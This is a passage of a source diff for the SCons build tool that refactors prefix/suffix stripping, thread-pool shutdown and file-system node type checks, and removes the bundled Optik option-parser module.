+    that need to turn something like 'libfoo.a' into '-lfoo'.
+ """ + if not list: + return list + if not callable(c): - if callable(env["_concat"]): - c = env["_concat"] + env_c = env['_concat'] + if env_c != _concat and callable(env_c): + # There's a custom _concat() method in the construction + # environment, and we've allowed people to set that in + # the past (see test/custom-concat.py), so preserve the + # backwards compatibility. + c = env_c else: - c = _concat - def f(list, sp=stripprefix, ss=stripsuffix): - result = [] - for l in list: - if isinstance(l, SCons.Node.FS.File): - result.append(l) - continue - if not SCons.Util.is_String(l): - l = str(l) - if l[:len(sp)] == sp: - l = l[len(sp):] - if l[-len(ss):] == ss: - l = l[:-len(ss)] - result.append(l) - return result - return c(prefix, list, suffix, env, f) + c = _concat_ixes + + if SCons.Util.is_List(list): + list = SCons.Util.flatten(list) -# This is an alternate _stripixes() function that passes all of our tests -# (as of 21 February 2007), like the current version above. It's more -# straightforward because it does its manipulation directly, not using -# the funky f call-back function to _concat(). (In this respect it's -# like the updated _defines() function below.) -# -# The most convoluted thing is that it still uses a custom _concat() -# function if one was placed in the construction environment; there's -# a specific test for that functionality, but it might be worth getting -# rid of. -# -# Since this work was done while trying to get 0.97 out the door -# (just prior to 0.96.96), I decided to be cautious and leave the old -# function as is, to minimize the chance of other corner-case regressions. -# The updated version is captured here so we can uncomment it and start -# using it at a less sensitive time in the development cycle (or when -# it's clearly required to fix something). 
-# -#def _stripixes(prefix, list, suffix, stripprefix, stripsuffix, env, c=None): -# """ -# This is a wrapper around _concat()/_concat_ixes() that checks for the -# existence of prefixes or suffixes on list elements and strips them -# where it finds them. This is used by tools (like the GNU linker) -# that need to turn something like 'libfoo.a' into '-lfoo'. -# """ -# -# if not list: -# return list -# -# if not callable(c): -# env_c = env['_concat'] -# if env_c != _concat and callable(env_c): -# # There's a custom _concat() method in the construction -# # environment, and we've allowed people to set that in -# # the past (see test/custom-concat.py), so preserve the -# # backwards compatibility. -# c = env_c -# else: -# c = _concat_ixes -# -# if SCons.Util.is_List(list): -# list = SCons.Util.flatten(list) -# -# lsp = len(stripprefix) -# lss = len(stripsuffix) -# stripped = [] -# for l in SCons.PathList.PathList(list).subst_path(env, None, None): -# if isinstance(l, SCons.Node.FS.File): -# stripped.append(l) -# continue -# if not SCons.Util.is_String(l): -# l = str(l) -# if l[:lsp] == stripprefix: -# l = l[lsp:] -# if l[-lss:] == stripsuffix: -# l = l[:-lss] -# stripped.append(l) -# -# return c(prefix, stripped, suffix, env) + lsp = len(stripprefix) + lss = len(stripsuffix) + stripped = [] + for l in SCons.PathList.PathList(list).subst_path(env, None, None): + if isinstance(l, SCons.Node.FS.File): + stripped.append(l) + continue + if not SCons.Util.is_String(l): + l = str(l) + if l[:lsp] == stripprefix: + l = l[lsp:] + if l[-lss:] == stripsuffix: + l = l[:-lss] + stripped.append(l) + + return c(prefix, stripped, suffix, env) def _defines(prefix, defs, suffix, env, c=_concat_ixes): """A wrapper around _concat_ixes that turns a list or string File src/engine/SCons/Environment.py # Prepend './' so the lookup doesn't interpret an initial # '#' on the file name portion as meaning the Node should # be relative to the top-level SConstruct directory. 
- target = self.fs.Entry('.'+os.sep+src.name, dnode) + target = dnode.Entry('.'+os.sep+src.name) tgt.extend(InstallBuilder(self, target, src)) return tgt File src/engine/SCons/Job.py signal.signal(signal.SIGINT, signal.SIG_IGN) raise + def cleanup(self): + self.job.cleanup() + class Serial: """This class is used to execute tasks in series, and is more efficient than Parallel, but is only appropriate for non-parallel builds. Only task.postprocess() + def cleanup(self): + pass # Trap import failure so that everything in the Job module but the # Parallel class (and its dependent classes) will work if the interpreter while 1: task = self.requestQueue.get() + if not task: + # The "None" value is used as a sentinel by + # ThreadPool.cleanup(). This indicates that there + # are no more tasks, so we should quit. + break + try: task.execute() except KeyboardInterrupt: self.resultsQueue = Queue.Queue(0) # Create worker threads + self.workers = [] for _ in range(num): - Worker(self.requestQueue, self.resultsQueue) + worker = Worker(self.requestQueue, self.resultsQueue) + self.workers.append(worker) def put(self, obj): """Put task into request queue.""" return self.resultsQueue.get(block) def preparation_failed(self, obj): - self.resultsQueue.put((obj, 0)) + self.resultsQueue.put((obj, False)) + + def cleanup(self): + """ + Shuts down the thread pool, giving each worker thread a + chance to shut down gracefully. + """ + # For each worker thread, put a sentinel "None" value + # on the requestQueue (indicating that there's no work + # to be done) so that each worker thread will get one and + # terminate gracefully. + for _ in self.workers: + self.requestQueue.put(None) + + # Wait for all of the workers to terminate. + # + # If we don't do this, later Python versions (2.4, 2.5) often + # seem to raise exceptions during shutdown. 
This happens + # in requestQueue.get(), as an assertion failure that + # requestQueue.not_full is notified while not acquired, + # seemingly because the main thread has shut down (or is + # in the process of doing so) while the workers are still + # trying to pull sentinels off the requestQueue. + # + # Normally these terminations should happen fairly quickly, + # but we'll stick a one-second timeout on here just in case + # someone gets hung. + for worker in self.workers: + worker.join(1.0) + self.workers = [] class Parallel: """This class is used to execute tasks in parallel, and is somewhat if self.tp.resultsQueue.empty(): break + + def cleanup(self): + self.tp.cleanup() File src/engine/SCons/JobTests.py self.was_prepared = 1 def execute(self): - raise "exception" + raise Exception def executed(self): self.taskmaster.num_executed = self.taskmaster.num_executed + 1 goodnode.__init__(self) self.expect_to_be = SCons.Node.failed def build(self, **kw): - raise 'badnode exception' + raise Exception, 'badnode exception' class slowbadnode (badnode): def build(self, **kw): # it is faster than slowgoodnode then these could complete # while the scheduler is sleeping. time.sleep(0.05) - raise 'slowbadnode exception' + raise Exception, 'slowbadnode exception' class badpreparenode (badnode): def prepare(self): - raise 'badpreparenode exception' + raise Exception, 'badpreparenode exception' class _SConsTaskTest(unittest.TestCase): File src/engine/SCons/Node/FS.py self.cwd = None # will hold the SConscript directory for target nodes self.duplicate = directory.duplicate + def must_be_same(self, klass): + """ + This node, which already existed, is being looked up as the + specified klass. Raise an exception if it isn't. + """ + if self.__class__ is klass or klass is Entry: + return + raise TypeError, "Tried to lookup %s '%s' as a %s." 
%\ (self.__class__.__name__, self.path, klass.__name__) + def get_dir(self): return self.dir name=self.name while dir: if dir.srcdir: - srcnode = self.fs.Entry(name, dir.srcdir, - klass=self.__class__) + srcnode = dir.srcdir.Entry(name) + srcnode.must_be_same(self.__class__) return srcnode name = dir.name + os.sep + name dir = dir.up() else: return self.get_contents() - def must_be_a_Dir(self): + def must_be_same(self, klass): """Called to make sure a Node is a Dir. Since we're an Entry, we can morph into one.""" - self.__class__ = Dir - self._morph() - return self + if not self.__class__ is klass: + self.__class__ = klass + self._morph() + self.clear() # The following methods can get called before the Taskmaster has # had a chance to call disambiguate() directly to see if this Entry def getcwd(self): return self._cwd - def __checkClass(self, node, klass): - if isinstance(node, klass) or klass == Entry: - return node - if node.__class__ == Entry: - node.__class__ = klass - node._morph() - return node - raise TypeError, "Tried to lookup %s '%s' as a %s." % \ - (node.__class__.__name__, node.path, klass.__name__) - def _doLookup_key(self, fsclass, name, directory = None, create = 1): return (fsclass, name, directory) # We tried to look up the entry in either an Entry or # a File. Give whatever it is a chance to do what's # appropriate: morph into a Dir or raise an exception. - directory.must_be_a_Dir() + directory.must_be_same(Dir) entries = directory.entries try: directory = entries[norm] directory.add_wkid(d) directory = d - directory.must_be_a_Dir() + directory.must_be_same(Dir) try: e = directory.entries[last_norm] directory.entries[last_norm] = result directory.add_wkid(result) else: - result = self.__checkClass(e, fsclass) + e.must_be_same(fsclass) + result = e memo_dict[memo_key] = result If directory is None, and name is a relative path, then the same applies. 
""" - if not SCons.Util.is_String(name): - # This handles cases where the object is a Proxy wrapping - # a Node.FS.File object (e.g.). It would be good to handle - # this more directly some day by having the callers of this - # function recognize that a Proxy can be treated like the - # underlying object (that is, get rid of the isinstance() - # calls that explicitly look for a Node.FS.Base object). + try: + # Decide if this is a top-relative look up. The normal case + # (by far) is handed a non-zero-length string to look up, + # so just (try to) check for the initial '#'. + top_relative = (name[0] == '#') + except (AttributeError, IndexError): + # The exceptions we may encounter in unusual cases: + # AttributeError: a proxy without a __getitem__() method. + # IndexError: a null string. + top_relative = False name = str(name) - if name and name[0] == '#': + if top_relative: directory = self.Top name = name[1:] if name and (name[0] == os.sep or name[0] == '/'): klass = Entry if isinstance(name, Base): - return self.__checkClass(name, klass) + name.must_be_same(klass) + return name else: if directory and not isinstance(directory, Dir): directory = self.Dir(directory) def entry_tpath(self, name): return self.tpath + os.sep + name - def must_be_a_Dir(self): - """Called to make sure a Node is a Dir. Since we're already - one, this is a no-op for us.""" - return self - def entry_exists_on_disk(self, name): try: d = self.on_disk_entries self.tpath = name + os.sep self._morph() + def must_be_same(self, klass): + if klass is Dir: + return + Base.must_be_same(self, klass) + def __str__(self): return self.abspath as dependency info. Convert the strings to actual Nodes (for use by the --debug=explain code and --implicit-cache). """ - Entry_func = self.node.dir.Entry + def str_to_node(s, entry=self.node.dir.Entry): + # This is a little bogus; we're going to mimic the lookup + # order of env.arg2nodes() by hard-coding an Alias lookup + # before we assume it's an Entry. 
This should be able to + # go away once the Big Signature Refactoring pickles the + # actual NodeInfo object, which will let us know precisely + # what type of Node to turn it into. + import SCons.Node.Alias + n = SCons.Node.Alias.default_ans.lookup(s) + if not n: + n = entry(s) + return n for attr in ['bsources', 'bdepends', 'bimplicit']: try: val = getattr(self, attr) except AttributeError: pass else: - setattr(self, attr, map(Entry_func, val)) + setattr(self, attr, map(str_to_node, val)) def format(self): result = [ self.ninfo.format() ] bkids = self.bsources + self.bdepends + self.bimplicit def Entry(self, name): """Create an entry node named 'name' relative to the SConscript directory of this file.""" - return self.fs.Entry(name, self.cwd) + return self.cwd.Entry(name) def Dir(self, name): """Create a directory node named 'name' relative to the SConscript directory of this file.""" - return self.fs.Dir(name, self.cwd) + return self.cwd.Dir(name) def Dirs(self, pathlist): """Create a list of directories relative to the SConscript def File(self, name): """Create a file node named 'name' relative to the SConscript directory of this file.""" - return self.fs.File(name, self.cwd) + return self.cwd.File(name) #def generate_build_dict(self): # """Return an appropriate dictionary of values for building Note that there's a special trick here with the execute flag (one that's not normally done for other actions). Basically - if the user requested a noexec (-n) build, then + if the user requested a no_exec (-n) build, then SCons.Action.execute_actions is set to 0 and when any action is called, it does its showing but then just returns zero instead of actually calling the action execution operation. dir = os.path.join(self.fs.CachePath, subdir) return dir, os.path.join(dir, cache_sig) - def must_be_a_Dir(self): - """Called to make sure a Node is a Dir. Since we're already a - File, this is a TypeError...""" - raise TypeError, "Tried to lookup File '%s' as a Dir." 
% self.path - default_fs = None class FileFinder: File src/engine/SCons/Node/FSTests.py x = e.get_executor() x.add_pre_action('pre') x.add_post_action('post') - e.must_be_a_Dir() + e.must_be_same(SCons.Node.FS.Dir) a = x.get_action_list() assert a[0] == 'pre', a assert a[2] == 'post', a File src/engine/SCons/Optik/__init__.py -"""optik - -A powerful, extensible, and easy-to-use command-line parser for Python. - -By Greg Ward <[email protected]> - -See http://optik.sourceforge.net/ -""" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "__init__.py,v 1.11 2002/04/11 19:17:34 gward Exp" - -__version__ = "1.3" - - -# Re-import these for convenience -from SCons.Optik.option import Option -from SCons.Optik.option_parser import \ - OptionParser, SUPPRESS_HELP, SUPPRESS_USAGE -from SCons.Optik.errors import OptionValueError - - -# Some day, there might be many Option classes. As of Optik 1.3, the -# preferred way to instantiate Options is indirectly, via make_option(), -# which will become a factory function when there are many Option -# classes. -make_option = Option File src/engine/SCons/Optik/errors.py -"""optik.errors - -Exception classes used by Optik. -""" - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "errors.py,v 1.5 2002/02/13 23:29:47 gward Exp" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -# created 2001/10/17 GPW (from optik.py) - - -class OptikError (Exception): - def __init__ (self, msg): - self.msg = msg - - def __str__ (self): - return self.msg - - -class OptionError (OptikError): - """ - Raised if an Option instance is created with invalid or - inconsistent arguments. 
- """ - - def __init__ (self, msg, option): - self.msg = msg - self.option_id = str(option) - - def __str__ (self): - if self.option_id: - return "option %s: %s" % (self.option_id, self.msg) - else: - return self.msg - -class OptionConflictError (OptionError): - """ - Raised if conflicting options are added to an OptionParser. - """ - -class OptionValueError (OptikError): - """ - Raised if an invalid option value is encountered on the command - line. - """ - -class BadOptionError (OptikError): - """ - Raised if an invalid or ambiguous option is seen on the command-line. - """ File src/engine/SCons/Optik/option.py -"""optik.option - -Defines the Option class and some standard value-checking functions. -""" - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "option.py,v 1.19.2.1 2002/07/23 01:51:14 gward Exp" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. 
- -# created 2001/10/17, GPW (from optik.py) - -import sys -import string -from types import TupleType, ListType, DictType -from SCons.Optik.errors import OptionError, OptionValueError - -_builtin_cvt = { "int" : (int, "integer"), - "long" : (long, "long integer"), - "float" : (float, "floating-point"), - "complex" : (complex, "complex") } - -def check_builtin (option, opt, value): - (cvt, what) = _builtin_cvt[option.type] - try: - return cvt(value) - except ValueError: - raise OptionValueError( - #"%s: invalid %s argument %s" % (opt, what, repr(value))) - "option %s: invalid %s value: %s" % (opt, what, repr(value))) - -def check_choice(option, opt, value): - if value in option.choices: - return value - else: - choices = string.join(map(repr, option.choices),", ") - raise OptionValueError( - "option %s: invalid choice: %s (choose from %s)" - % (opt, repr(value), choices)) - -# Not supplying a default is different from a default of None, -# so we need an explicit "not supplied" value. -NO_DEFAULT = "NO"+"DEFAULT" - - -class Option: - """ - Instance attributes: - _short_opts : [string] - _long_opts : [string] - - action : string - type : string - dest : string - default : any - nargs : int - const : any - choices : [string] - callback : function - callback_args : (any*) - callback_kwargs : { string : any } - help : string - metavar : string - """ - - # The list of instance attributes that may be set through - # keyword args to the constructor. - ATTRS = ['action', - 'type', - 'dest', - 'default', - 'nargs', - 'const', - 'choices', - 'callback', - 'callback_args', - 'callback_kwargs', - 'help', - 'metavar'] - - # The set of actions allowed by option parsers. Explicitly listed - # here so the constructor can validate its arguments. 
- ACTIONS = ("store", - "store_const", - "store_true", - "store_false", - "append", - "count", - "callback", - "help", - "version") - - # The set of actions that involve storing a value somewhere; - # also listed just for constructor argument validation. (If - # the action is one of these, there must be a destination.) - STORE_ACTIONS = ("store", - "store_const", - "store_true", - "store_false", - "append", - "count") - - # The set of actions for which it makes sense to supply a value - # type, ie. where we expect an argument to this option. - TYPED_ACTIONS = ("store", - "append", - "callback") - - # The set of known types for option parsers. Again, listed here for - # constructor argument validation. - TYPES = ("string", "int", "long", "float", "complex", "choice") - - # Dictionary of argument checking functions, which convert and - # validate option arguments according to the option type. - # - # Signature of checking functions is: - # check(option : Option, opt : string, value : string) -> any - # where - # option is the Option instance calling the checker - # opt is the actual option seen on the command-line - # (eg. "-a", "--file") - # value is the option argument seen on the command-line - # - # The return value should be in the appropriate Python type - # for option.type -- eg. an integer if option.type == "int". - # - # If no checker is defined for a type, arguments will be - # unchecked and remain strings. - TYPE_CHECKER = { "int" : check_builtin, - "long" : check_builtin, - "float" : check_builtin, - "complex" : check_builtin, - "choice" : check_choice, - } - - - # CHECK_METHODS is a list of unbound method objects; they are called - # by the constructor, in order, after all attributes are - # initialized. The list is created and filled in later, after all - # the methods are actually defined. (I just put it here because I - # like to define and document all class attributes in the same - # place.) 
Subclasses that add another _check_*() method should - # define their own CHECK_METHODS list that adds their check method - # to those from this class. - CHECK_METHODS = None - - - # -- Constructor/initialization methods ---------------------------- - - def __init__ (self, *opts, **attrs): - # Set _short_opts, _long_opts attrs from 'opts' tuple - opts = self._check_opt_strings(opts) - self._set_opt_strings(opts) - - # Set all other attrs (action, type, etc.) from 'attrs' dict - self._set_attrs(attrs) - - # Check all the attributes we just set. There are lots of - # complicated interdependencies, but luckily they can be farmed - # out to the _check_*() methods listed in CHECK_METHODS -- which - # could be handy for subclasses! The one thing these all share - # is that they raise OptionError if they discover a problem. - for checker in self.CHECK_METHODS: - checker(self) - - def _check_opt_strings (self, opts): - # Filter out None because early versions of Optik had exactly - # one short option and one long option, either of which - # could be None. 
- opts = filter(None, opts) - if not opts: - raise OptionError("at least one option string must be supplied", - self) - return opts - - def _set_opt_strings (self, opts): - self._short_opts = [] - self._long_opts = [] - for opt in opts: - if len(opt) < 2: - raise OptionError( - "invalid option string %s: " - "must be at least two characters long" % (`opt`,), self) - elif len(opt) == 2: - if not (opt[0] == "-" and opt[1] != "-"): - raise OptionError( - "invalid short option string %s: " - "must be of the form -x, (x any non-dash char)" % (`opt`,), - self) - self._short_opts.append(opt) - else: - if not (opt[0:2] == "--" and opt[2] != "-"): - raise OptionError( - "invalid long option string %s: " - "must start with --, followed by non-dash" % (`opt`,), - self) - self._long_opts.append(opt) - - def _set_attrs (self, attrs): - for attr in self.ATTRS: - if attrs.has_key(attr): - setattr(self, attr, attrs[attr]) - del attrs[attr] - else: - if attr == 'default': - setattr(self, attr, NO_DEFAULT) - else: - setattr(self, attr, None) - if attrs: - raise OptionError( - "invalid keyword arguments: %s" % string.join(attrs.keys(),", "), - self) - - - # -- Constructor validation methods -------------------------------- - - def _check_action (self): - if self.action is None: - self.action = "store" - elif self.action not in self.ACTIONS: - raise OptionError("invalid action: %s" % (`self.action`,), self) - - def _check_type (self): - if self.type is None: - # XXX should factor out another class attr here: list of - # actions that *require* a type - if self.action in ("store", "append"): - if self.choices is not None: - # The "choices" attribute implies "choice" type. - self.type = "choice" - else: - # No type given? "string" is the most sensible default. 
- self.type = "string" - else: - if self.type not in self.TYPES: - raise OptionError("invalid option type: %s" % (`self.type`,), self) - if self.action not in self.TYPED_ACTIONS: - raise OptionError( - "must not supply a type for action %s" % (`self.action`,), self) - - def _check_choice(self): - if self.type == "choice": - if self.choices is None: - raise OptionError( - "must supply a list of choices for type 'choice'", self) - elif type(self.choices) not in (TupleType, ListType): - raise OptionError( - "choices must be a list of strings ('%s' supplied)" - % string.split(str(type(self.choices)),"'")[1], self) - elif self.choices is not None: - raise OptionError( - "must not supply choices for type %s" % (repr(self.type),), self) - - def _check_dest (self): - if self.action in self.STORE_ACTIONS and self.dest is None: - # No destination given, and we need one for this action. - # Glean a destination from the first long option string, - # or from the first short option string if no long options. - if self._long_opts: - # eg. 
"--foo-bar" -> "foo_bar" - self.dest = string.replace(self._long_opts[0][2:],'-', '_') - else: - self.dest = self._short_opts[0][1] - - def _check_const (self): - if self.action != "store_const" and self.const is not None: - raise OptionError( - "'const' must not be supplied for action %s" % (repr(self.action),), - self) - - def _check_nargs (self): - if self.action in self.TYPED_ACTIONS: - if self.nargs is None: - self.nargs = 1 - elif self.nargs is not None: - raise OptionError( - "'nargs' must not be supplied for action %s" % (repr(self.action),), - self) - - def _check_callback (self): - if self.action == "callback": - if not callable(self.callback): - raise OptionError( - "callback not callable: %s" % (repr(self.callback),), self) - if (self.callback_args is not None and - type(self.callback_args) is not TupleType): - raise OptionError( - "callback_args, if supplied, must be a tuple: not %s" - % (repr(self.callback_args),), self) - if (self.callback_kwargs is not None and - type(self.callback_kwargs) is not DictType): - raise OptionError( - "callback_kwargs, if supplied, must be a dict: not %s" - % (repr(self.callback_kwargs),), self) - else: - if self.callback is not None: - raise OptionError( - "callback supplied (%s) for non-callback option" - % (repr(self.callback),), self) - if self.callback_args is not None: - raise OptionError( - "callback_args supplied for non-callback option", self) - if self.callback_kwargs is not None: - raise OptionError( - "callback_kwargs supplied for non-callback option", self) - - - CHECK_METHODS = [_check_action, - _check_type, - _check_choice, - _check_dest, - _check_const, - _check_nargs, - _check_callback] - - - # -- Miscellaneous methods ----------------------------------------- - - def __str__ (self): - if self._short_opts or self._long_opts: - return string.join(self._short_opts + self._long_opts,"/") - else: - raise RuntimeError, "short_opts and long_opts both empty!" 
    def takes_value (self):
        return self.type is not None


    # -- Processing methods --------------------------------------------

    def check_value (self, opt, value):
        checker = self.TYPE_CHECKER.get(self.type)
        if checker is None:
            return value
        else:
            return checker(self, opt, value)

    def process (self, opt, value, values, parser):

        # First, convert the value(s) to the right type.  Howl if any
        # value(s) are bogus.
        if value is not None:
            if self.nargs == 1:
                value = self.check_value(opt, value)
            else:
                def cv(v,check=self.check_value,o=opt):
                    return check(o,v)

                value = tuple(map(cv,value))

        # And then take whatever action is expected of us.
        # This is a separate method to make life easier for
        # subclasses to add new actions.
        return self.take_action(
            self.action, self.dest, opt, value, values, parser)

    def take_action (self, action, dest, opt, value, values, parser):
        if action == "store":
            setattr(values, dest, value)
        elif action == "store_const":
            setattr(values, dest, self.const)
        elif action == "store_true":
            setattr(values, dest, 1)
        elif action == "store_false":
            setattr(values, dest, 0)
        elif action == "append":
            values.ensure_value(dest, []).append(value)
        elif action == "count":
            setattr(values, dest, values.ensure_value(dest, 0) + 1)
        elif action == "callback":
            args = self.callback_args or ()
            kwargs = self.callback_kwargs or {}
            apply( self.callback, (self, opt, value, parser,)+ args, kwargs)
        elif action == "help":
            parser.print_help()
            sys.exit(0)
        elif action == "version":
            parser.print_version()
            sys.exit(0)
        else:
            raise RuntimeError, "unknown action %s" % (repr(self.action),)

        return 1

# class Option

File src/engine/SCons/Optik/option_parser.py

"""optik.option_parser

Provides the OptionParser and Values classes.
"""

__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"

# Original Optik revision this is based on:
__Optik_revision__ = "option_parser.py,v 1.38.2.1 2002/07/23 01:51:14 gward Exp"

# Copyright (c) 2001 Gregory P. Ward.  All rights reserved.
# See the README.txt distributed with Optik for licensing terms.

# created 2001/10/17, GPW (from optik.py)

import sys, os
import string
import types
from SCons.Optik.option import Option, NO_DEFAULT
from SCons.Optik.errors import OptionConflictError, OptionValueError, BadOptionError

def get_prog_name ():
    return os.path.basename(sys.argv[0])


SUPPRESS_HELP = "SUPPRESS"+"HELP"
SUPPRESS_USAGE = "SUPPRESS"+"USAGE"

class Values:

    def __init__ (self, defaults=None):
        if defaults:
            for (attr, val) in defaults.items():
                setattr(self, attr, val)


    def _update_careful (self, dict):
        """
        Update the option values from an arbitrary dictionary, but only
        use keys from dict that already have a corresponding attribute
        in self.  Any keys in dict without a corresponding attribute
        are silently ignored.
        """
        for attr in dir(self):
            if dict.has_key(attr):
                dval = dict[attr]
                if dval is not None:
                    setattr(self, attr, dval)

    def _update_loose (self, dict):
        """
        Update the option values from an arbitrary dictionary,
        using all keys from the dictionary regardless of whether
        they have a corresponding attribute in self or not.
        """
        self.__dict__.update(dict)

    def _update (self, dict, mode):
        if mode == "careful":
            self._update_careful(dict)
        elif mode == "loose":
            self._update_loose(dict)
        else:
            raise ValueError, "invalid update mode: %s" % (repr(mode),)

    def read_module (self, modname, mode="careful"):
        __import__(modname)
        mod = sys.modules[modname]
        self._update(vars(mod), mode)

    def read_file (self, filename, mode="careful"):
        vars = {}
        execfile(filename, vars)
        self._update(vars, mode)

    def ensure_value (self, attr, value):
        if not hasattr(self, attr) or getattr(self, attr) is None:
            setattr(self, attr, value)
        return getattr(self, attr)


class OptionParser:
    """
    Class attributes:
      standard_option_list : [Option]
        list of standard options that will be accepted by all instances
        of this parser class (intended to be overridden by subclasses).

    Instance attributes:
      usage : string
        a usage string for your program.  Before it is displayed
        to the user, "%prog" will be expanded to the name of
        your program (os.path.basename(sys.argv[0])).
      option_list : [Option]
        the list of all options accepted on the command-line of
        this program
      _short_opt : { string : Option }
        dictionary mapping short option strings, eg. "-f" or "-X",
        to the Option instances that implement them.  If an Option
        has multiple short option strings, it will appears in this
        dictionary multiple times.
      _long_opt : { string : Option }
        dictionary mapping long option strings, eg. "--file" or
        "--exclude", to the Option instances that implement them.
        Again, a given Option can occur multiple times in this
        dictionary.
      defaults : { string : any }
        dictionary mapping option destination names to default
        values for each destination.

      allow_interspersed_args : boolean = true
        if true, positional arguments may be interspersed with options.
        Assuming -a and -b each take a single argument, the command-line
          -ablah foo bar -bboo baz
        will be interpreted the same as
          -ablah -bboo -- foo bar baz
        If this flag were false, that command line would be interpreted as
          -ablah -- foo bar -bboo baz
        -- ie. we stop processing options as soon as we see the first
        non-option argument.  (This is the tradition followed by
        Python's getopt module, Perl's Getopt::Std, and other argument-
        parsing libraries, but it is generally annoying to users.)

      rargs : [string]
        the argument list currently being parsed.  Only set when
        parse_args() is active, and continually trimmed down as
        we consume arguments.  Mainly there for the benefit of
        callback options.
      largs : [string]
        the list of leftover arguments that we have skipped while
        parsing options.  If allow_interspersed_args is false, this
        list is always empty.
      values : Values
        the set of option values currently being accumulated.  Only
        set when parse_args() is active.  Also mainly for callbacks.

    Because of the 'rargs', 'largs', and 'values' attributes,
    OptionParser is not thread-safe.  If, for some perverse reason, you
    need to parse command-line arguments simultaneously in different
    threads, use different OptionParser instances.

    """

    standard_option_list = []


    def __init__ (self,
                  usage=None,
                  option_list=None,
                  option_class=Option,
                  version=None,
                  conflict_handler="error"):
        self.set_usage(usage)
        self.option_class = option_class
        self.version = version
        self.set_conflict_handler(conflict_handler)
        self.allow_interspersed_args = 1

        # Create the various lists and dicts that constitute the
        # "option list".  See class docstring for details about
        # each attribute.
        self._create_option_list()

        # Populate the option list; initial sources are the
        # standard_option_list class attribute, the 'option_list'
        # argument, and the STD_VERSION_OPTION global (if 'version'
        # supplied).
        self._populate_option_list(option_list)

        self._init_parsing_state()

    # -- Private methods -----------------------------------------------
    # (used by the constructor)

    def _create_option_list (self):
        self.option_list = []
        self._short_opt = {}            # single letter -> Option instance
        self._long_opt = {}             # long option -> Option instance
        self.defaults = {}              # maps option dest -> default value

    def _populate_option_list (self, option_list):
        if self.standard_option_list:
            self.add_options(self.standard_option_list)
        if option_list:
            self.add_options(option_list)

    def _init_parsing_state (self):
        # These are set in parse_args() for the convenience of callbacks.
        self.rargs = None
        self.largs = None
        self.values = None


    # -- Simple modifier methods ---------------------------------------

    def set_usage (self, usage):
        if usage is None:
            self.usage = "usage: %prog [options]"
        elif usage is SUPPRESS_USAGE:
            self.usage = None
        else:
            self.usage = usage

    def enable_interspersed_args (self):
        self.allow_interspersed_args = 1

    def disable_interspersed_args (self):
        self.allow_interspersed_args = 0

    def set_conflict_handler (self, handler):
        if handler not in ("ignore", "error", "resolve"):
            raise ValueError, "invalid conflict_resolution value %s" % (repr(handler),)
        self.conflict_handler = handler

    def set_default (self, dest, value):
        self.defaults[dest] = value

    def set_defaults (self, **kwargs):
        self.defaults.update(kwargs)

    def get_default_values(self):
        return Values(self.defaults)


    # -- Option-adding methods -----------------------------------------

    def _check_conflict (self, option):
        conflict_opts = []
        for opt in option._short_opts:
            if self._short_opt.has_key(opt):
                conflict_opts.append((opt, self._short_opt[opt]))
        for opt in option._long_opts:
            if self._long_opt.has_key(opt):
                conflict_opts.append((opt, self._long_opt[opt]))

        if conflict_opts:
            handler = self.conflict_handler
            if handler == "ignore":     # behaviour for Optik 1.0, 1.1
                pass
            elif handler == "error":    # new in 1.2
                raise OptionConflictError(
                    "conflicting option string(s): %s"
                    % string.join( map( lambda x: x[0], conflict_opts),", "),
                    option)
            elif handler == "resolve":  # new in 1.2
                for (opt, c_option) in conflict_opts:
                    if len(opt)>2 and opt[:2]=="--":
                        c_option._long_opts.remove(opt)
                        del self._long_opt[opt]
                    else:
                        c_option._short_opts.remove(opt)
                        del self._short_opt[opt]
                    if not (c_option._short_opts or c_option._long_opts):
                        self.option_list.remove(c_option)


    def add_option (self, *args, **kwargs):
        """add_option(Option)
           add_option(opt_str, ..., kwarg=val, ...)
        """
        if type(args[0]) is types.StringType:
            option = apply(self.option_class,args, kwargs)
        elif len(args) == 1 and not kwargs:
            option = args[0]
            if not isinstance(option, Option):
                raise TypeError, "not an Option instance: %s" % (repr(option),)
        else:
            raise TypeError, "invalid arguments"

        self._check_conflict(option)

        self.option_list.append(option)
        for opt in option._short_opts:
            self._short_opt[opt] = option
        for opt in option._long_opts:
            self._long_opt[opt] = option

        if option.dest is not None:     # option has a dest, we need a default
            if option.default is not NO_DEFAULT:
                self.defaults[option.dest] = option.default
            elif not self.defaults.has_key(option.dest):
                self.defaults[option.dest] = None

    def add_options (self, option_list):
        for option in option_list:
            self.add_option(option)


    # -- Option query/removal methods ----------------------------------

    def get_option (self, opt_str):
        return (self._short_opt.get(opt_str) or
                self._long_opt.get(opt_str))

    def has_option (self, opt_str):
        return (self._short_opt.has_key(opt_str) or
                self._long_opt.has_key(opt_str))


    def remove_option (self, opt_str):
        option = self._short_opt.get(opt_str)
        if option is None:
            option = self._long_opt.get(opt_str)
        if option is None:
            raise ValueError("no such option %s" % (repr(opt_str),))

        for opt in option._short_opts:
            del self._short_opt[opt]
        for opt in option._long_opts:
            del self._long_opt[opt]
        self.option_list.remove(option)


    # -- Option-parsing methods ----------------------------------------

    def _get_args (self, args):
        if args is None:
            return sys.argv[1:]
        else:
            return args[:]              # don't modify caller's list

    def parse_args (self, args=None, values=None):
        """
        parse_args(args : [string] = sys.argv[1:],
                   values : Values = None)
        -> (values : Values, args : [string])

        Parse the command-line options found in 'args' (default:
        sys.argv[1:]).  Any errors result in a call to 'error()', which
        by default prints the usage message to stderr and calls
        sys.exit() with an error message.  On success returns a pair
        (values, args) where 'values' is an Values instance (with all
        your option values) and 'args' is the list of arguments left
        over after parsing options.
        """
        rargs = self._get_args(args)
        if values is None:
            values = self.get_default_values()

        # Store the halves of the argument list as attributes for the
        # convenience of callbacks:
        #   rargs
        #     the rest of the command-line (the "r" stands for
        #     "remaining" or "right-hand")
        #   largs
        #     the leftover arguments -- ie. what's left after removing
        #     options and their arguments (the "l" stands for "leftover"
        #     or "left-hand")
        self.rargs = rargs
